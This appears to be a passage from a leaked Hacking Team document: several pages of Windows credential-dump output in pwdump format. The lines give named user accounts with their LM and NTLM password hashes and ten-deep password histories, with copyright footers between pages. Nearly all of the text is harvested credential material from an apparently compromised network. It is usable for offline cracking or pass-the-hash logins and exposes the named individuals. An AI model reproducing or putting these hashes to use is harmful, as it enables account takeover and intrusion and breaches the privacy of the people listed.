PKanani_history_2:1138:51E33F9B91B454DAB15C99B9326C16BA:D57431FF719DE94B92BD0DADA6EE93B7:::
PKanani_history_3:1138:616C9C36F0C8EC1A78890D7028EC0494:431C91BBBD83A1C8F81F9EEAAECE0ACE:::
PKanani_history_4:1138:13303225E1F0D12C0BE406769EDFC4FE:AE308EF498F917DD44DDD8678CCCDACA:::
PKanani_history_5:1138:EC5939047D83958F12A664B6B4825B5A:7E36AD105E0B53AA44429F69383E38FE:::
PKanani_history_6:1138:A07D6181DE06FD7D1B0CB26CC25F5A1B:D276AB71F0BFBADBB5B574A2D18B83C4:::
PKanani_history_7:1138:93D9DCE2ED1746733096D0D01339B199:EDFD899E18194B4775075C85E50EF468:::
PKanani_history_8:1138:BFB6EE6055A1AFFDAB882584DEF593BA:61930A447AB0E167BF6713AE7061018E:::
PKanani_history_9:1138:CDB1E3D5985CF5C8CB36F4B26EBEAD1F:726C24AF5CB86156E3D227D64F333094:::
PKanani_history_10:1138:BFB6EE6055A1AFFDED3C4FF631A0A827:2874AD9ADF29A41436B4FE842A244E7A:::
AKohler:1139:CA905A14A55E87DCC2265B23734E0DAC:8419DF9AC89C388B262032A6C7C64D48:::
AKohler_history_0:1139:9B4908FE296EB655C2265B23734E0DAC:412403CCE4F34E79ED3AB608BF05B7C0:::
AKohler_history_1:1139:A080D8E3F124CC1140A1677F746A9583:A2EAEF2571A2DDDE98A12564BB6D780B:::
AKohler_history_2:1139:9AAA0D46684DD8A1C2265B23734E0DAC:EECEB7ED0BB68BEC1966D24451E25053:::
AKohler_history_3:1139:A37478C6CD79E91E875E96E00500AC35:3F3FDBD155D39DC3EAA23F99A222F5ED:::
AKohler_history_4:1139:6B857A5BDD5D8A315D599E721B11C679:06F07B9B3FA0AB5B146199E868365BCA:::
AKohler_history_5:1139:A587F3DC0A76CA443A42A312238BDE6E:703861FA916FC92AAF7076EC5BE3CF01:::
AKohler_history_6:1139:D812F69725338FF6A3CF7C7B039E8FC9:84E2495EB85168B757F7543612AE78E0:::
AKohler_history_7:1139:C6431E21F0804891ECDF8729E682E4D6:D344BB44CB1E80E6CF0CD20DA21BB586:::
AKohler_history_8:1139:93B8776368E65F2661C42405BC24C44C:0E8CACE8D54C917B166D1F0A089FBCD3:::
AKohler_history_9:1139:8D3F0B04372687B70CC3EB564B0F9047:6DD8B41550B65AAD465C8CF1CE36C6C9:::
AKohler_history_10:1139:A587F3DC0A76CA44C2265B23734E0DAC:CDDAA631BA7D944EF4D6535DEB1011F2:::
CMackain:1140:C5D1F5C6EC4D3571B46FDA3DAB9FC854:48E707328AFEF677A9025B4B681BE409:::
CMackain_history_0:1140:C5D1F5C6EC4D35712BAAD3720A6FFA3C:3A398DB45E8C73FFBC7DE0C4F860893B:::
CMackain_history_1:1140:C5D1F5C6EC4D3571800096859C2FAAD2:E559BC371EE12E1FE061499C62B8CC28:::
CMackain_history_2:1140:C5D1F5C6EC4D35715D5A0FEC67C76C05:C23C639C9EBC29B1CA5E6F1F2A14716D:::
CMackain_history_3:1140:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
CMackain_history_4:1140:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
CMackain_history_5:1140:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
AMalvar:1141:A91CE934EF5DDAFA17306D272A9441BB:3A4875EC9D130A2D2BEC5F6B8468D628:::
AMalvar_history_0:1141:08EDCED9C78EB8CFF1BF0A0880F5F70E:CEE28DB5854BA129D4258414E6E59FF2:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 399 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
AMalvar_history_1:1141:AA79E536EDFC475E19E0455872579705:40801326107CCFAA6EE6553D11BDB198:::
AMalvar_history_2:1141:EB7618163563325A35E4113CA6CE3A86:944B8B64B11CB0B2950A2BDA88E8F54A:::
AMalvar_history_3:1141:4EFC971E2C6A11F08B4C5FC57CE52905:1BF44A0ABF4912C38977FE74AD76237F:::
AMalvar_history_4:1141:03D29FB6B09A7C0A5186DB21888E8E6A:50EE6BEE1A5E93828FF8B4AE26113544:::
AMalvar_history_5:1141:A4570CF7141C22232A5007CEA14ED64F:1ED8163B7A8DD12F420A0C7C5AB3B9CF:::
AMalvar_history_6:1141:367609D22010C2E355EADA851E21AAB0:A506508AC3EEA7CBBFFBD81DA2553339:::
AMalvar_history_7:1141:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AMalvar_history_8:1141:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
FMargini:1142:11F53B0E3D180C87A1CFB79381BFD03C:CB1AEB70BF8AB09DFDEF96337B61A987:::
FMargini_history_0:1142:11F53B0E3D180C874D0565D34DC3EB22:28FFCAA02D69D0BA0222A0148627E65C:::
FMargini_history_1:1142:11F53B0E3D180C873D036687FA064ACB:947BD9E60D09EE0DA2A377EBAA5918A1:::
FMargini_history_2:1142:11F53B0E3D180C879E901288C14E9C8D:E150D6E479E419F25EEAAE22D4A7EA93:::
FMargini_history_3:1142:11F53B0E3D180C87F30FA128ED8D264F:A2D5C46F1BFD0E1C97FAC1A536B280D0:::
FMargini_history_4:1142:11F53B0E3D180C87DD995DCD9D026345:DA45DB36C484F7792193E0F41FAD0952:::
FMargini_history_5:1142:11F53B0E3D180C87D99CEF2A2BB6946F:63BCE6FB6C5E385222FB75E96FD8D4E0:::
FMargini_history_6:1142:11F53B0E3D180C87805817AE58E19515:2C534EF3300B56552A47E0E4A3F87D27:::
FMargini_history_7:1142:11F53B0E3D180C87844F5CC0AEA649F3:6ADE2A4D3C1106E633164899BA1CA211:::
FMargini_history_8:1142:11F53B0E3D180C872A54B884BD399F1B:6632F34BDA4975DB09BEA2390EC51CF7:::
FMargini_history_9:1142:11F53B0E3D180C87A9CB0077D0B8A2BA:8234D191BA4128AD1E7935B3B547C326:::
FMargini_history_10:1142:02B13ED485A54463A5477152E50B737D:0CAA081375FFBA177A36CC563422F79E:::
NPatel:1143:4E8691E98B3C7A2AC81667E9D738C5D9:B16E349B95CD4388475AE19320734C88:::
NPatel_history_0:1143:4E8691E98B3C7A2A9C5014AE4718A7EE:4020340B473C1854AD9D52191E68ED15:::
NPatel_history_1:1143:4E8691E98B3C7A2AFF17365FAF1FFE89:C219BF8CB5A5B87A41FC6B82C4B20E7A:::
NPatel_history_2:1143:4E8691E98B3C7A2A1AA818381E4E281B:DB7C157D2C2515AEDC01F64E062E011D:::
NPatel_history_3:1143:4E8691E98B3C7A2A1D71060D896B7A46:270349CE604E1579967EE16E01B1A4C2:::
NPatel_history_4:1143:4E8691E98B3C7A2AC2265B23734E0DAC:43F1770CB4536097EC621AEA92C813A8:::
NPatel_history_5:1143:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
NPatel_history_6:1143:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
NPatel_history_7:1143:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
NPatel_history_8:1143:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
AProni:1144:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
AProni_history_0:1144:367609D22010C2E32C5AE1F1CFB9210F:9DDE72FE6653B000D6886A2E2699F678:::
AProni_history_1:1144:367609D22010C2E34207FD0DF35A59A8:826BAB5A34E4670C7439A1000C945468:::
AProni_history_2:1144:367609D22010C2E35D3872C04445E010:68C6402C3E5127277BC2CAF8332C4FF2:::
AProni_history_3:1144:367609D22010C2E36D3A627C824F029F:4E36C4492EC13C3DFFFF5A1E18338953:::
AProni_history_4:1144:367609D22010C2E309752A3293831D17:99F15D797C2CE3019F1555371FD5C167:::
AProni_history_5:1144:367609D22010C2E336077A718CCDF409:87C50395BC8035C13E481CAF76103C21:::
AProni_history_6:1144:367609D22010C2E37C3113B4A1A5E3A0:F6FFACC0CFFD5FAA5BD713DCE64D7A6A:::
AProni_history_7:1144:367609D22010C2E3C81667E9D738C5D9:D63649BFA654987C6A44C57AF2911804:::
AProni_history_8:1144:367609D22010C2E39C5014AE4718A7EE:DD168176BC9D462032F1A3D87FF32FD3:::
AProni_history_9:1144:367609D22010C2E3FF17365FAF1FFE89:9B63592D067E096A731FF5E52B414E3B:::
AProni_history_10:1144:367609D22010C2E31AA818381E4E281B:D2348FF4BC068FFAEEE545A8000E7BD3:::
PRakotovao:1145:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
PRakotovao_history_0:1145:367609D22010C2E3B75E0C8D76954A50:C3E9FBBB2A5453DC28F923884B38ED27:::
PRakotovao_history_1:1145:367609D22010C2E31287083AC1589DED:DE6BA3E6CE2C398B1A3A3910901EBDBB:::
PRakotovao_history_2:1145:367609D22010C2E3C6EBE8776A153FEB:1E0A899141FE7F370CF3587A372CA166:::
PRakotovao_history_3:1145:367609D22010C2E3143F8BD9AE9E0363:6BB49CA1D30CE246D19F941207F56857:::
PRakotovao_history_4:1145:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
PRakotovao_history_5:1145:367609D22010C2E36D3A627C824F029F:4E36C4492EC13C3DFFFF5A1E18338953:::
PRakotovao_history_6:1145:367609D22010C2E309752A3293831D17:99F15D797C2CE3019F1555371FD5C167:::
PRakotovao_history_7:1145:367609D22010C2E336077A718CCDF409:87C50395BC8035C13E481CAF76103C21:::
PRakotovao_history_8:1145:367609D22010C2E37C3113B4A1A5E3A0:F6FFACC0CFFD5FAA5BD713DCE64D7A6A:::
PRakotovao_history_9:1145:367609D22010C2E3C81667E9D738C5D9:D63649BFA654987C6A44C57AF2911804:::
PRakotovao_history_10:1145:367609D22010C2E39C5014AE4718A7EE:DD168176BC9D462032F1A3D87FF32FD3:::
LRedgwell:1146:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
LRedgwell_history_0:1146:C37E1E35315186ABC2265B23734E0DAC:A5A6894ED752E3E56DFB25668C479924:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 400 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LRedgwell_history_1:1146:C37E1E35315186ABC2265B23734E0DAC:A5A6894ED752E3E56DFB25668C479924:::
LRedgwell_history_2:1146:17CAA4E4C821FABA4A3B108F3FA6CB6D:1A3B923EFB2027B9F187A60CDB3782C4:::
LRedgwell_history_3:1146:C37E1E35315186ABC2265B23734E0DAC:A5A6894ED752E3E56DFB25668C479924:::
LRedgwell_history_4:1146:17CAA4E4C821FABA4A3B108F3FA6CB6D:1A3B923EFB2027B9F187A60CDB3782C4:::
LRedgwell_history_5:1146:C37E1E35315186ABC2265B23734E0DAC:A5A6894ED752E3E56DFB25668C479924:::
LRedgwell_history_6:1146:C37E1E35315186ABCCF9155E3E7DB453:9F158316A66DDE3F3F138EBBA40B0851:::
LRedgwell_history_7:1146:C37E1E35315186AB4207FD0DF35A59A8:64F1870C9BCCAB602C34F743A719A4F4:::
LRedgwell_history_8:1146:C37E1E35315186ABC2265B23734E0DAC:A5A6894ED752E3E56DFB25668C479924:::
LRedgwell_history_9:1146:EB1ABD27A21B7FE2E8FE7C63554C0405:32E81D2A93B32FA1168E84FF03560FE3:::
LRedgwell_history_10:1146:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
JSawyer:1147:EDADF08C5846226EB75E0C8D76954A50:0F7087522B1A1F4CE2B3EABFB62C0A02:::
JSawyer_history_0:1147:F99FCDC18C2E328A73251AA2B4314B90:39973A71283B55D0414B3867A9E71464:::
JSawyer_history_1:1147:2C43660A1B7586BE7C3113B4A1A5E3A0:3A5C7B2179E1CA05D829937A7186C03F:::
JSawyer_history_2:1147:2C43660A1B7586BEC81667E9D738C5D9:CE059C1B7959F6136507C84ACF30552B:::
JSawyer_history_3:1147:F99FCDC18C2E328A25AD3B83FA6627C7:305F4EAB28B94BBF9BAFC871204199BA:::
JSawyer_history_4:1147:F99FCDC18C2E328AC2265B23734E0DAC:88E12249CB6EB22A5C7ED4F4E1064FBF:::
JSawyer_history_5:1147:6477BF886E9E5CF0C2265B23734E0DAC:98A53083606185C62CB6649A1A0CDB59:::
JSawyer_history_6:1147:C9ED3C2AF127C773C81667E9D738C5D9:13CD342A2A1BA131959C37A4E19806A3:::
JSawyer_history_7:1147:71D9689FEDAE76E09797D56B534FC4AA:BDE1E5805DBA5383F1F3DB3C1CB1D639:::
JSawyer_history_8:1147:6B7E420E6176DFE48E48EFC3B085CED8:E1F3C0F0A262EC8C8F80A6F5B98EF0C2:::
JSawyer_history_9:1147:A2005CB76F28632F7323269C049A8FC4:52EF7690065BCD4D9944B10639C475AF:::
JSawyer_history_10:1147:A2005CB76F28632F62B3C526806729AF:47722A153947142CE999C51DA2CF5B39:::
ETaplin:1148:F11D460E09E9CB8411CB84344B1C1808:624E73D84445E429A3130B59D86802C3:::
ETaplin_history_0:1148:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
ETaplin_history_1:1148:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
TTaylor:1149:0DAD80A9EF281EB8D35D1D822457670D:CA5A87374AF3B95E7939B73124E03631:::
TTaylor_history_0:1149:0DAD80A9EF281EB8D2BC0685B5D8533B:7B1AED528420660FBD78E08F4CA9B6A8:::
TTaylor_history_1:1149:0DAD80A9EF281EB8D9FD524C82F61086:D8618B542686429E8D64A00F8343F7EE:::
TTaylor_history_2:1149:0DAD80A9EF281EB8F4B51F43BFE7E162:5EAEE3EB1C58A963DF5063D9A465D7AC:::
TTaylor_history_3:1149:0DAD80A9EF281EB81FA0D3C06DB75BE9:E32F9C733722D03BEF9BB1EB4C435F2E:::
TTaylor_history_4:1149:0DAD80A9EF281EB81B32347EEE452079:8DD48D579F31C0B3856EB607F4665C4B:::
TTaylor_history_5:1149:0DAD80A9EF281EB86F50740870DD2B43:DE8A91AAFFA80EA8CE5C15CE58F5F601:::
TTaylor_history_6:1149:0DAD80A9EF281EB8EE609C43AC77FEDA:A63E9096FB6D280C6F530E993A04FE07:::
TTaylor_history_7:1149:0DAD80A9EF281EB803E4CD9F61BB5070:53E3723BB36D7BBADEEFE237778F400A:::
TTaylor_history_8:1149:0DAD80A9EF281EB813205FBDE4F0B307:095D940C9CFB6AEA223CDA48E0E0D24E:::
TTaylor_history_9:1149:0DAD80A9EF281EB827C1C668DEE863A1:981B7351C456CC0CB4B6804CC09AB99D:::
TTaylor_history_10:1149:9C7343D6341BF2E1D520CD100C0BCB40:D97FB24D8FD22746059238705B222285:::
FTesta:1150:B0AD12A634B351262C5AE1F1CFB9210F:DCFFF37E057ED98FC9004D7E50C24455:::
FTesta_history_0:1150:B0AD12A634B351264207FD0DF35A59A8:E7CA8220152B5E7C92B728B5BB5DE008:::
FTesta_history_1:1150:B0AD12A634B351265D3872C04445E010:75E665BA67F752885F1B96B2B4F3ADCC:::
FTesta_history_2:1150:B0AD12A634B3512609752A3293831D17:46464687640580950D46AE5ED38B5673:::
FTesta_history_3:1150:B0AD12A634B3512636077A718CCDF409:CB3450898D06843AF0DBF02A0FC9846E:::
FTesta_history_4:1150:B0AD12A634B351267C3113B4A1A5E3A0:5EC561E0CF4C80206556665CA7C0749F:::
FTesta_history_5:1150:B0AD12A634B35126C81667E9D738C5D9:275C3D1A882341F5441A3ADE6CFD3CBC:::
FTesta_history_6:1150:B0AD12A634B351269C5014AE4718A7EE:3CB34BE0D82C1DC8CB0DB613774CA02F:::
FTesta_history_7:1150:B0AD12A634B35126FF17365FAF1FFE89:DE9F420F7ED3F848388A0345ECE5A02D:::
FTesta_history_8:1150:B0AD12A634B351261AA818381E4E281B:5978BDA63C56EB17B64D32320218692D:::
FTesta_history_9:1150:B0AD12A634B351261D71060D896B7A46:FBA4FF251165E965E3B7026A27F15C06:::
FTesta_history_10:1150:B0AD12A634B35126C2265B23734E0DAC:4446A8070F5AF777DD2AD94C40D43D82:::
BTraill:1151:F6BD219CD7C10FF48D989D02E7F332D1:80AA1920E62869C0EFA947C76536710F:::
BTraill_history_0:1151:F6BD219CD7C10FF47B264130C245F6DD:EA199A1C28541AC5C5A02BB1D776D357:::
BTraill_history_1:1151:F6BD219CD7C10FF4E1B79117B9CF8DC5:2CA38314FF5DC83D16D900BD90E1C707:::
BTraill_history_2:1151:F6BD219CD7C10FF478DF7C3EA8FEC756:E7FEE391A22E3A91AC47F0FF99C5AA0E:::
BTraill_history_3:1151:F6BD219CD7C10FF4DC0ADAAC127D3673:C979AEB495BC5040DACDD1B406380E7D:::
BTraill_history_4:1151:F6BD219CD7C10FF4A55A49703DA15294:A5DD17A154C98BB3DF10A6161F87CC1D:::
BTraill_history_5:1151:F6BD219CD7C10FF4E589D6819C41F1AD:61EF31812101D73086AAF54E6F80A79D:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 401 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
BTraill_history_6:1151:F6BD219CD7C10FF4A91E548719C3AC6E:51FDC3DEEC07FF02C963CE3865811C9D:::
BTraill_history_7:1151:F6BD219CD7C10FF4EC44577791D1BB4F:D3AD8CE423AA119EE8A3954FAABA40BD:::
BTraill_history_8:1151:F6BD219CD7C10FF42B999340D53ADC02:1F5971E86A92C41A37D97C47D37B1401:::
BTraill_history_9:1151:151FCB9EBEC7AB4A36077A718CCDF409:E1DA064120EFC9E480A3B8677BC9665A:::
BTraill_history_10:1151:4FD70CA95EDFEFE036077A718CCDF409:0ABD0691FE69600A7B6B40C2F3282BE5:::
LViteau:1152:43D119E8B3D8710BCCF9155E3E7DB453:59E3D14BA635542BDDA3577FAE6AFF03:::
LViteau_history_0:1152:43D119E8B3D8710BE8450C7E07112982:5194451C14E7635F0FB615122D689A04:::
LViteau_history_1:1152:C429DBC1D068B38849525ED34AB60EE5:9455D45FE879DE7F7B75529F8023C4E0:::
LViteau_history_2:1152:43D119E8B3D8710B5DE349F503BBA07C:645C8374705CEAC45A057DB8048FCBAE:::
LViteau_history_3:1152:CEA103D1E3E8EBA92179CA56DDF48430:7E8B878D4F671281ADCC191F40E073AF:::
LViteau_history_4:1152:67BD2D0600DF079DBD7A161A26778896:DB938C0DA4ADA1B6C289FE62DA0C2A36:::
LViteau_history_5:1152:E448239640D3DC503CB9B5FD2065896F:F08BB99559148944149938C47023C080:::
LViteau_history_6:1152:9A97838461B07044C2713EC87060DF47:A4923518CAE9328CDE46AB6F82C5A58E:::
LViteau_history_7:1152:D97FB28D4E8B5B9E944E2DF489A880E4:B507F87BCD2B6578B62763E37593DFAE:::
LViteau_history_8:1152:43D119E8B3D8710B6D9DD43D64B5222A:8C02612449F4B29A43AC7318CD54F26B:::
LViteau_history_9:1152:43D119E8B3D8710B6BA2730853FC2C19:3782B387AA9E7C54DA889D84891BBEAC:::
LViteau_history_10:1152:43D119E8B3D8710B5D3872C04445E010:8CD47BA53174CBC013680A359468B8BB:::
RWalton:1153:E701F9FAB541320C9C5014AE4718A7EE:CA749E7062A55AE2EE74738BB0D041AD:::
RWalton_history_0:1153:4FE4B4EE6D105E8CFF17365FAF1FFE89:C3910825D7D66E60D30F9415A8AB2870:::
RWalton_history_1:1153:366283F6C863350E1AA818381E4E281B:A80B4739B09C28FBE53BDF755E33C7D7:::
RWalton_history_2:1153:B3EACD273364DB0A1D71060D896B7A46:1E66A968CF0F03082FE6FD0E4E83BD0F:::
RWalton_history_3:1153:A0E76FA72DC59C6D73251AA2B4314B90:1B4F0CFB8D053C698678F909823FBFD1:::
RWalton_history_4:1153:2FE3D2B694BA8FDB09752A3293831D17:F9233DB38806B819C0CC322096E716D4:::
RWalton_history_5:1153:0A57F78D0709FADA81F1DD21F1B958F9:D0988B15E26B476534613E32AA51E4C1:::
RWalton_history_6:1153:C8586DECD763B4FA6AB0B9B4DA013120:69E897FB9ED653F57BD89F9038DAA3E9:::
RWalton_history_7:1153:91B4C1816AE43A9AC81667E9D738C5D9:C02091BC49E7432BE680A2D4DD80B947:::
RWalton_history_8:1153:NO PASSWORD*********************:6264723E6965F9F23CC670012240F1C4:::
RWalton_history_9:1153:6FF0DF655A717F01C2265B23734E0DAC:F765E244EDE0AB85177C5BB988680CAD:::
RWalton_history_10:1153:0A57F78D0709FADA106869B8D2A7E8B6:5D01673423C852BC1E8A86C760773A3C:::
CWohleber:1154:CCF970671FA1BB73A65CEC33BDA3B2C3:FB31E6CFC596434E1C687B28F47AACA5:::
CWohleber_history_0:1154:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
CWohleber_history_1:1154:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
CWohleber_history_2:1154:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
CWohleber_history_3:1154:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
CWohleber_history_4:1154:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
SStark:1155:8F94E508EE962FAC0F98C6487723845F:C5D75E2EF9203675D02EC570D84AB945:::
SStark_history_0:1155:8F94E508EE962FAC1BB9F8B05EADD3D2:CB8A56BA8A3895A414E5154314F49883:::
SStark_history_1:1155:8F94E508EE962FAC6655BB50E4AFC517:518F53E4F53CB8052669E58A23BBAE18:::
SStark_history_2:1155:8F94E508EE962FAC68CC6A784EC0AA85:8A15BBABB76A47E13F78CAC89DE82B41:::
SStark_history_3:1155:8F94E508EE962FAC8A2194397F1D2BB6:68346A16A08A37D10DE56CD349CCCC80:::
SStark_history_4:1155:8F94E508EE962FACAA4A54B7DFAFB0E1:DA0BF5F2B0FB641ADD9851D02E0E3F53:::
SStark_history_5:1155:8F94E508EE962FACFE9B5E9F8018170C:F0785CB2DB4DEDBF684C12382233D5D6:::
SStark_history_6:1155:8F94E508EE962FACDA3775FFE3B098DC:D340A8F3E5896D32CB734E8133AAAF40:::
SStark_history_7:1155:8F94E508EE962FACD28DC6CA913D52C5:8AE39E09D49ADA5E36D215A9522A4FB4:::
SStark_history_8:1155:8F94E508EE962FAC4E150BE530E35122:95EEE91E6EEDB87E7DDC6F77B9ACFB41:::
SStark_history_9:1155:8F94E508EE962FACB6ADE946D094C65A:51ED208B7028B2C76C0A21C361189217:::
SStark_history_10:1155:8F94E508EE962FAC1C423D6BEFF2AB84:1CC28E6C4C872DD3986ABBE45EF4E531:::
JWinslade:1156:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
ABattaglia:1157:BBB2A1BB0482B4D4F16A0858F40109DB:AE0920974ECC6A29688296ABFA5AB291:::
ABattaglia_history_0:1157:BBB2A1BB0482B4D4DD48C6A0489BD714:F0FF086819E050F8A7F69D45539E52AF:::
ABattaglia_history_1:1157:BBB2A1BB0482B4D4C79845A985B69350:315E1AF750F5650D96986B1158191E70:::
ABattaglia_history_2:1157:BBB2A1BB0482B4D4120758FBF9E8A7F8:C5EF0C72ED623164D799D9FEC6D55682:::
ABattaglia_history_3:1157:BBB2A1BB0482B4D42C5AE1F1CFB9210F:2E4FA007E3C077102A1F790BB94A443B:::
ABattaglia_history_4:1157:BBB2A1BB0482B4D44207FD0DF35A59A8:FA5C6A47231384ADB27FBE86F54773B8:::
ABattaglia_history_5:1157:BBB2A1BB0482B4D45D3872C04445E010:E2C23BE2E1968B1F97C206CDC7F8B550:::
ABattaglia_history_6:1157:BBB2A1BB0482B4D46D3A627C824F029F:A114D5087E0A0F98C8502593E7EA474A:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 402 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ABattaglia_history_7:1157:BBB2A1BB0482B4D409752A3293831D17:78E90116213A16C25DB125F120DB3F52:::
ABattaglia_history_8:1157:BBB2A1BB0482B4D436077A718CCDF409:6C42191F5931FBF0A414116619C47093:::
ABattaglia_history_9:1157:BBB2A1BB0482B4D47C3113B4A1A5E3A0:3CAC63EBD067764D2622C645E069A712:::
ABattaglia_history_10:1157:BBB2A1BB0482B4D4C81667E9D738C5D9:BE69865808C64CC487B1DD3B01C93707:::
PBizzoca:1158:DCBD2627566AAD127A01665EB2EB6C14:F8E0998200670583D5A5D51ACEBBE42B:::
PBizzoca_history_0:1158:DAB0E8C851FAF42FAE64E8458CD5D3B6:468EF50FA7830C113BBA20F933AAF52F:::
PBizzoca_history_1:1158:DAB0E8C851FAF42FD772ED253A981CEF:09A48A38E29F6F77D9FA2CEAA271C378:::
PBizzoca_history_2:1158:DAB0E8C851FAF42F3B7631FCE03308B9:0F203C4727AB2AB1C31B8051E8F4DBB3:::
PBizzoca_history_3:1158:DAB0E8C851FAF42F65C4A55F32B3BF85:7B2331ED70C9D3410641AA1A6B57032C:::
PBizzoca_history_4:1158:CEEB0FA9F240C200C5D3B53DC1AA2319:BC7429A0123AA5669798685C0D25E632:::
PBizzoca_history_5:1158:D278E69987353C4C453CD0BEDF1E41E4:358864CD47C1C7A3CD20261CCDD8B1BA:::
PBizzoca_history_6:1158:08BEFE6FEACDDBAB73251AA2B4314B90:C21DE9B4627E3772C99DE7F7FC1CF798:::
PBizzoca_history_7:1158:D7D42D1D8EB51113C11F717CE7533CB3:B834ECA1877A414C252BD6CB52FE59EA:::
PBizzoca_history_8:1158:156BDCDEEF568582FF17365FAF1FFE89:01A733615BCD6682186CC0D2726EEE90:::
PBizzoca_history_9:1158:FEED4CB2D69F7CC21AA818381E4E281B:FE7E8338D1C6A79340E70607AD4BD512:::
PBizzoca_history_10:1158:2804A835FF9C7F59A98162E176A4D728:875AA7F2D05663B809422370B8A4E9E6:::
FCampanella:1159:F6FFD85771EA644818FCD526FB48A829:01F17AA36BF592312182547D527C1DC6:::
FCampanella_history_0:1159:F49C142ABE6532BB7A01665EB2EB6C14:774587623F0F2E14B37570053BCD681B:::
FCampanella_history_1:1159:0F2E759C31B335567A01665EB2EB6C14:F62F2AEB4CFCE32DB38C250DC5541A77:::
FCampanella_history_2:1159:CF0020780648A942B3A23F4730883E44:E4EA01951053820573E7ABF49BA1972A:::
FCampanella_history_3:1159:8E238A48E316309534EFFCAF3B9E6C9C:C5EC16E580819DD754D9954BCF5F0FFE:::
FCampanella_history_4:1159:282ABABBDD2992E2AB47A1B697FBF322:1A057C22202632E8143FDF1E4A9B00BF:::
FCampanella_history_5:1159:44DB96899D7CD54734EFFCAF3B9E6C9C:4DCC5676FEF8F3581B453AF960C31FB4:::
FCampanella_history_6:1159:88F222C3CB5539098B4C5FC57CE52905:87236DF01DBF7EF0BE0A719A9997DD07:::
FCampanella_history_7:1159:4984AD335FCDC5C086CA3DF1DA09DAC4:BA65935F27E25ABDDFE015D70E804F5D:::
FCampanella_history_8:1159:99525499DD8E1586D36976F155D3BA23:2659C827AAEA5AE3BA68A1D1478DDED1:::
FCampanella_history_9:1159:42C4063759E471E3AE91A15A9FDF9D77:571F7348AFBF8D7EB21F2019300FE85A:::
FCampanella_history_10:1159:3BD2020210BC09798B4C5FC57CE52905:B86E34132E9E8E099EA54130FAA55360:::
LGuasco:1160:E7D97F5B5B6B607E1C87150A85585851:BA3DE9D4A480A716E1BEE8C91CC367B9:::
LGuasco_history_0:1160:E7D97F5B5B6B607E2AF8ED095500A1CC:47335577AC57C873183B104C820160C3:::
LGuasco_history_1:1160:E7D97F5B5B6B607EACE19620DD1098C6:58B6886C2A852DFEEF5D41651FA0636E:::
LGuasco_history_2:1160:E7D97F5B5B6B607E0362ADA8D5D34AC1:C86442CF7CB1BDDC279E8FD500F68444:::
LGuasco_history_3:1160:E7D97F5B5B6B607E5B239BAA11380FC8:748E3CD5CD2BB452D562885F14B2110E:::
LGuasco_history_4:1160:E7D97F5B5B6B607E5D359CADC77C8BA5:ED35AA8AA9B2F029609758A3E57FDF17:::
LGuasco_history_5:1160:E7D97F5B5B6B607E0D3FEDA46305E93C:6A5B922BC0842CE95CB99153A2240495:::
LGuasco_history_6:1160:E7D97F5B5B6B607E8D32E87EEA8373D1:9BB9C48D8C31F3E670FBA2346257DCBE:::
LGuasco_history_7:1160:E7D97F5B5B6B607E810D2319A651430B:C6B35822D15EFCC2F35919E0838BE4C3:::
LGuasco_history_8:1160:E7D97F5B5B6B607EFAE88307FDB26453:93E7CCA900A3CF14F1B5CD1EA4829455:::
LGuasco_history_9:1160:E7D97F5B5B6B607EBD1CB3C70C5B1267:7780C01B6CC17334F9F667CFDF1ADCA3:::
LGuasco_history_10:1160:E7D97F5B5B6B607E872D72784695C56B:D52FC4BD40F0C4ACA965BC569E96DBBA:::
GManzullo:1161:E52CAC67419A9A227A2415B0E339BD9F:9105AC0CC77A9C78AA252E9801C75399:::
